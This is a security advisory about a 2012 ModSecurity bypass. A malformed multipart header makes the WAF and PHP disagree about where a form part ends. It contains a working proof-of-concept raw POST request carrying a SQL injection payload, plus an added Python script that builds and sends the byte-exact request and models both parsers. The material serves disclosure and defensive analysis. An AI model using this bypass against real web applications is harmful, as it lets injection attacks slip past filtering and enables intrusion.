ModSecurity – ‘POST’ Security Bypass

  • Author: Bernhard Mueller
    Date: 2012-10-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/37949/
  • Source: https://www.securityfocus.com/bid/56096/info
    
    ModSecurity is prone to a security-bypass vulnerability: its multipart/form-data parser and the one in PHP disagree about where a part ends when a part header is malformed. A request can therefore be built in which ModSecurity sees the attacker's payload as the body of a file-upload part, while PHP delivers the same bytes as the value of an ordinary POST parameter.
    
    Successful exploits allow attackers to bypass filtering rules that inspect request arguments (for example SQL injection signatures applied to POST parameters); this may aid in further attacks.
    
    ModSecurity 2.6.8 is vulnerable; other versions may also be affected.
    
    Proof of concept:
    -----------------
    
    wut.php:
    --------
    
    <?php echo $_POST['xxx']; /* echoes the parameter back so the bypass is visible */ ?>
    
    
    POST request:
    -------------
    
    POST /wut.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=A
    Content-Length: 161
    
    --A
    Content-Disposition: form-data; name="xxx"[\r][\r][\n]
    --A
    Content-Disposition: form-data; name="yyy"; filename="z"
    
    1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
    
    --A--
    
    ([\r][\r][\n] marks the literal bytes CR CR LF that end the first part's header line; no blank line follows it before the second delimiter. All other line breaks are CRLF, and the Content-Length of 161 includes the CRLF after the closing delimiter.)
    
    
    Output:
    -------
    
    1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--
    
    (Any change to the header should produce a 403.)
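The request above has to be emitted byte for byte (an ordinary HTTP client will not produce the CR CR LF sequence), and it works because the WAF and PHP disagree about where the first part ends. The following Python script is an added example, not part of the original advisory or of either project's code: it builds the PoC body exactly as shown, derives the Content-Length (161), and runs the body through two deliberately simplified parser models, one that splits on delimiters first (the RFC 2046 reading a WAF needs) and one that mimics PHP's rfc1867 header reader (read header lines until an empty line, fold a colon-less line into the previous header, use the first Content-Disposition). The host name, path and the `send_raw` helper are placeholders.

```python
import re
import socket

# Constructed sample values, copied from the PoC on this page.
BOUNDARY = b"A"
PAYLOAD = b"1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--"


def build_body(boundary=BOUNDARY, payload=PAYLOAD):
    """Byte-exact copy of the PoC body. The first part header ends in CR CR LF and is
    followed directly by a delimiter, with no blank line; every other line ends in CRLF."""
    delim = b"--" + boundary
    return b"".join([
        delim, b"\r\n",
        b'Content-Disposition: form-data; name="xxx"', b"\r\r\n",  # the malformed header line
        delim, b"\r\n",
        b'Content-Disposition: form-data; name="yyy"; filename="z"', b"\r\n",
        b"\r\n",
        payload, b"\r\n",
        delim, b"--\r\n",                                        # closing delimiter
    ])


def build_request(host=b"target.example", path=b"/wut.php",
                  boundary=BOUNDARY, payload=PAYLOAD):
    """Raw HTTP/1.1 request, assembled by hand so the CR CR LF bytes survive.
    host is a placeholder, not a real target."""
    body = build_body(boundary, payload)
    head = b"".join([
        b"POST ", path, b" HTTP/1.1\r\n",
        b"Host: ", host, b"\r\n",
        b"Content-Type: multipart/form-data; boundary=", boundary, b"\r\n",
        b"Content-Length: ", str(len(body)).encode(), b"\r\n",
        b"Connection: close\r\n",
        b"\r\n",
    ])
    return head + body


def send_raw(host, port, request):
    """Deliver the request over a plain socket and return the start of the response."""
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(request)
        return sock.recv(65536)


def _param(disposition, key):
    """Extract a quoted parameter (name= or filename=) from a Content-Disposition value."""
    m = re.search(rb'(?:^|;)\s*' + key + rb'="([^"]*)"', disposition)
    return m.group(1) if m else None


def parse_delimiter_first(body, boundary):
    """Simplified model of an RFC 2046 parser: split the body at every delimiter first,
    then read each part's headers. A part with filename= is a file upload, not a field."""
    fields, files = {}, {}
    delim = b"--" + boundary
    # A delimiter only counts at the start of the body or directly after a CRLF.
    pieces = re.split(rb"(?:^|\r\n)" + re.escape(delim), body)
    for piece in pieces[1:]:                  # pieces[0] is the (empty) preamble
        if piece.startswith(b"--"):           # closing delimiter
            break
        part = piece[2:] if piece.startswith(b"\r\n") else piece
        head, sep, data = part.partition(b"\r\n\r\n")
        if not sep:                           # header block only, no body
            head, data = part, b""
        disposition = b""
        for line in head.split(b"\r\n"):
            key, colon, value = line.partition(b":")
            if colon and key.strip().lower() == b"content-disposition":
                disposition = value.strip()
                break
        name = _param(disposition, b"name")
        if _param(disposition, b"filename") is not None:
            files[name] = data
        else:
            fields[name] = data
    return fields, files


def parse_php_style(body, boundary):
    """Simplified model of PHP's rfc1867 reader: after a delimiter line, read header
    lines until an empty line, folding any line without a colon into the previous
    header value; the first Content-Disposition is used. A delimiter inside the
    header block is therefore never recognised as one."""
    fields, files = {}, {}
    delim = b"--" + boundary
    # get_line(): read up to LF and strip a single trailing CR
    lines = [l[:-1] if l.endswith(b"\r") else l for l in body.split(b"\n")]
    i = 0
    while i < len(lines):
        if lines[i] == delim + b"--":         # closing delimiter
            break
        if lines[i] != delim:                 # skip forward to a delimiter line
            i += 1
            continue
        i += 1
        headers = []
        while i < len(lines) and lines[i] != b"":
            line = lines[i]
            i += 1
            key, colon, value = line.partition(b":")
            if colon and not line[:1].isspace():
                headers.append([key.lower(), value.lstrip()])
            elif headers:                     # no colon: continuation of previous header
                headers[-1][1] += line
        i += 1                                # skip the empty line
        data = []
        while i < len(lines) and lines[i] not in (delim, delim + b"--"):
            data.append(lines[i])
            i += 1
        disposition = next((v for k, v in headers if k == b"content-disposition"), b"")
        name = _param(disposition, b"name")
        if _param(disposition, b"filename") is not None:
            files[name] = b"\n".join(data)
        else:
            fields[name] = b"\n".join(data)
    return fields, files


if __name__ == "__main__":
    body = build_body()
    print("Content-Length:", len(body))
    print("delimiter-first (WAF) view:", parse_delimiter_first(body, BOUNDARY))
    print("PHP-style view:           ", parse_php_style(body, BOUNDARY))
```

Running it prints the two views side by side: the delimiter-first model reports xxx as an empty field and the payload as the content of uploaded file yyy, so a rule that inspects request arguments never sees it; the PHP-style model reports xxx equal to the payload, which is exactly what wut.php echoes back.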